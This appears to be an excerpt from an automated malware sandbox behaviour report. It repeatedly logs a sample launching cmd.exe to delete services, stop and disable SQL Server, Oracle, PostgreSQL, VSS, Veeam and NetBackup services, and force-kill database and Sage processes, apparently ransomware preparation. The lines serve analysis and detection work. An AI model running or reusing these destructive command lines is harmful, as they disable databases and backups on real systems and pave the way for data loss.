        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
